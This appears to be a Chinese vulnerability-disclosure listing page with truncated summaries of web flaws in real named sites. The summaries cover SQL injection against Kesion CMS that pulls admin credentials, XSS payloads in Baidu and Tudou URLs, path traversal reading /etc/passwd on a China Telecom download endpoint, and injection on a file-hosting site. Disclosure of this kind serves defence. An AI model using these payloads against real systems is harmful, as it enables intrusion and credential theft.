-
科讯kesion 6.x - 7.06 漏洞
本地搭建php+apache后,直接丢工具就可以跑了。 <?php/*$str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From...
-
百度游戏合作伙伴跨站
详细说明:php?action=change%22%3e%3cscript%3ealert('">http://youxi.m.baidu.com/modify_all.php?action=change%22%3e%3cs...
-
中国电信翼聊网站任意下载漏洞
详细说明:wap.ecplive.cn/ecpclientdown/download.do?file=../../../../../../../../../etc/passwdfile这个参数另外shadow也可以的所以webserver应...
-
土豆用户注册存在XSS跨站
简要描述:可被利用挂马详细说明:漏洞证明:http://login.tudou.com/reg.do?service=http%3A%2F%2Fcrest.tudou.com%2Flovesmile%2Fuid=%22%3E%3E%3Cif...
-
126网盘注入
作者: 我了个去简要描述:公告处的一个猪肉,大家都懂得详细说明:php?id=4">http://www.126disk.com/gonggao.php?id=4root权限,400disk库也可查看,也可以load fi...
